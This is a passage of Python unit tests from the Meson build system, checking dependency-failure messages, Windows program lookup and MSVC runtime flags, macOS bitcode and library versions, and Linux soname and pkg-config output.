# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(BOOST_ROOT.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
        1. The correct message is output when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. A wrap file from a subproject is used but fails because it does not
contain required keys.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
path = os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
        # Pin the exact ignore list so that any change forces this test to be
        # updated, and so that each entry is exercised below
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
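        # Helper: set the linker-selection environment variable for @lang (and its
        # deprecated alias, if any) to @name and check that the detected compiler's
        # linker id equals @expected.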
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP:
envvars.append(
mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]])
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
def sanitycheck_vscrt(vscrt):
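            # Every sanity-check compile command recorded in the meson log must use
            # the expected CRT flag.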
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
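        # Helper: return (compatibility_version, current_version) parsed from the
        # `otool -L` output for the given binary.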
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
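        # Configure should succeed even when CFLAGS carries linker-only and otherwise
        # unused flags that the compile checks have to filter out
        # (see common/108 has arg).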
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags so we have to parse the
        # generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
        # See common/47 pkgconfig-gen/meson.build for a description of the case this test covers.
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
self.assertIn('Libs.private: -lz', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
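        # Point pkg-config at the uninstalled .pc files Meson generates under meson-uninstalled.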
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
